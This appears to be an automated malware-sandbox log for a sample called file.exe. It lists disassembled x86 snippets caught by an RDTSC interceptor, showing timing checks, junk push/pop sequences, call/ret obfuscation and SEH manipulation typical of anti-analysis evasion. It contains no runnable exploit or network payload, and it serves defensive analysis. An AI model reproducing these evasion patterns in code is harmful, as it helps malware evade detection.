Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76987 second address: D7698D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76ACF second address: D76ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 ja 00007F8CE4DC41A6h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7970E second address: D79712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79712 second address: D79723 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F8CE4DC41A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79AF1 second address: D79B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F8CE470D04Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79B00 second address: D79B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CE4DC41B2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79B1A second address: D79B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79B20 second address: D79B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79C01 second address: D79C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A3E5 second address: D7A440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F8CE4DC41A8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b nop 0x0000002c je 00007F8CE4DC41C4h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F8CE4DC41B6h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A683 second address: D7A688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7AA14 second address: D7AA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE4DC41B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7AA36 second address: D7AA5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8CE470D046h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8CE470D055h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7AEDC second address: D7AEE6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8CE4DC41ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B946 second address: D7B94A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C947 second address: D7C94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C13F second address: D7C15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D058h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C94B second address: D7C968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F8CE4DC41A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C968 second address: D7CA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F8CE470D056h 0x0000000d pop edi 0x0000000e nop 0x0000000f jmp 00007F8CE470D055h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F8CE470D048h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F8CE470D048h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push ebx 0x0000004d pushad 0x0000004e mov eax, dword ptr [ebp+122D2B20h] 0x00000054 mov eax, dword ptr [ebp+122D2AE4h] 0x0000005a popad 0x0000005b pop esi 0x0000005c jmp 00007F8CE470D054h 0x00000061 add dword ptr [ebp+1246AB93h], ecx 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c pop eax 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CA15 second address: D7CA19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E350 second address: D7E355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E355 second address: D7E35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E35D second address: D7E363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E363 second address: D7E38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CE4DC41B7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F8CE4DC41AEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E38A second address: D7E3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jmp 00007F8CE470D057h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E3AD second address: D7E3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E3B3 second address: D7E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E3B7 second address: D7E3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C336 second address: D3C355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Ch 0x00000009 jmp 00007F8CE470D04Eh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EA41 second address: D7EA69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE4DC41B2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EA69 second address: D7EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EA6F second address: D7EAB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c cld 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D32F2h] 0x00000015 push 00000000h 0x00000017 xor esi, 0D1BE9E5h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F8CE4DC41B3h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EAB8 second address: D7EABE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EABE second address: D7EAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EAC4 second address: D7EAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80543 second address: D80567 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8CE4DC41B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80567 second address: D8057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D051h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8057C second address: D80580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F293 second address: D7F299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F299 second address: D7F29F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F915 second address: D3F91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F29F second address: D7F2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80B6A second address: D80B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80B86 second address: D80B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82AD6 second address: D82ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8429D second address: D8434C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CE4DC41A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F8CE4DC41BEh 0x00000011 nop 0x00000012 call 00007F8CE4DC41B2h 0x00000017 pushad 0x00000018 mov bx, D4BCh 0x0000001c popad 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F8CE4DC41A8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jmp 00007F8CE4DC41B6h 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F8CE4DC41A8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov bx, di 0x0000005e mov edi, dword ptr [ebp+122D2C98h] 0x00000064 push eax 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8434C second address: D84352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D828A0 second address: D828A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8530C second address: D85310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85310 second address: D85347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8CE4DC41B1h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D853F8 second address: D853FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D853FE second address: D85404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85404 second address: D85408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85408 second address: D85429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8643C second address: D864D0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D19DAh], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F8CE470D048h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F8CE470D048h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 mov dword ptr [ebp+1245BB66h], edi 0x0000004f xchg eax, esi 0x00000050 jmp 00007F8CE470D051h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jne 00007F8CE470D05Ch 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87346 second address: D8734A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8734A second address: D873C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CE470D059h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8CE470D048h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D2F1Dh] 0x0000002d push 00000000h 0x0000002f cmc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F8CE470D048h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c movzx edi, cx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F8CE470D04Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D84494 second address: D844AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CE4DC41B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D844AE second address: D8452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 11E75597h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 je 00007F8CE470D058h 0x0000001a jmp 00007F8CE470D052h 0x0000001f jnp 00007F8CE470D046h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov ebx, dword ptr [ebp+12449A45h] 0x00000032 mov eax, dword ptr [ebp+122D0801h] 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F8CE470D048h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 push FFFFFFFFh 0x00000054 pushad 0x00000055 stc 0x00000056 mov ecx, 44DEAA07h 0x0000005b popad 0x0000005c nop 0x0000005d jmp 00007F8CE470D04Ah 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D893C3 second address: D89414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 js 00007F8CE4DC41B2h 0x0000000c jmp 00007F8CE4DC41ACh 0x00000011 nop 0x00000012 mov bx, si 0x00000015 mov di, DC39h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F8CE4DC41A8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 stc 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+124499ACh], ecx 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pushad 0x00000043 popad 0x00000044 pop edi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85584 second address: D85588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A4A0 second address: D8A4C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8CE4DC41A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A4C0 second address: D8A4D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A4D2 second address: D8A52A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE4DC41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, esi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F8CE4DC41A8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 movsx ebx, cx 0x0000002c push 00000000h 0x0000002e or ebx, 755CF47Ch 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 jnp 00007F8CE4DC41A6h 0x0000003e pop esi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D874E6 second address: D874EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D874EA second address: D874F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D874F0 second address: D8756E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8CE470D046h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sbb ebx, 1BCED897h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F8CE470D048h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 or ebx, dword ptr [ebp+122D34D6h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 or dword ptr [ebp+12471C00h], ebx 0x00000049 mov eax, dword ptr [ebp+122D04CDh] 0x0000004f mov bl, al 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F8CE470D048h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000016h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d cmc 0x0000006e movsx edi, dx 0x00000071 push eax 0x00000072 push esi 0x00000073 push eax 0x00000074 push edx 0x00000075 push ebx 0x00000076 pop ebx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6CF second address: D8A6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C810 second address: D8C815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C815 second address: D8C81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C81B second address: D8C81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F01E second address: D8F029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9004A second address: D90050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90050 second address: D90056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90056 second address: D9005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D901A5 second address: D901A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D901A9 second address: D901C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F8CE470D054h 0x00000010 rdtsc
